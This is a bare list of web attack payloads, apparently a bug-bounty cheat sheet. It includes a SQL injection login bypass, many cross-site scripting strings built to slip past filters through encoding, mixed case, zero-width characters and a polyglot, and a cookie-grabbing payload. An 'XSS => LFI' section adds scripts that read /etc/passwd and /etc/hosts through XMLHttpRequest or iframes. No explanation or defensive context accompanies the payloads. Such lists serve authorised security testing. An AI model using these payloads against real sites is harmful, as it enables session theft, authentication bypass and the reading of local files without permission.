'or 1=1 limit 1-- -
'"()><img src="x"><a href="https://google.com">click</a>
%22%27%3E%3CA%20HREF=%22http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%22%3EXSS%3C/A%3E
x" onerror​="alert(1)
<img src="YOUR_LINK_HERE">
'"><A HRef=\" AutoFocus OnFocus​=top/**/?.document%2Bcookie>
'-confirm(/OPENBUGBOUNTY/)//
<sVg/onfake="x=y"oNload​=prompt(/OPENBUGBOUNTY/)>
website*com/test/%22%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3e

XSS => LFI
<script>
    x=new XMLHttpRequest;
    x.onload=function(){
        document.write(this.responseText)
    };
    x.open("GET","file:///etc/passwd");
    x.send();
</script>

<script>document.write(%27<iframe%20src=file://///etc/hosts></iframe>%27);</script>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
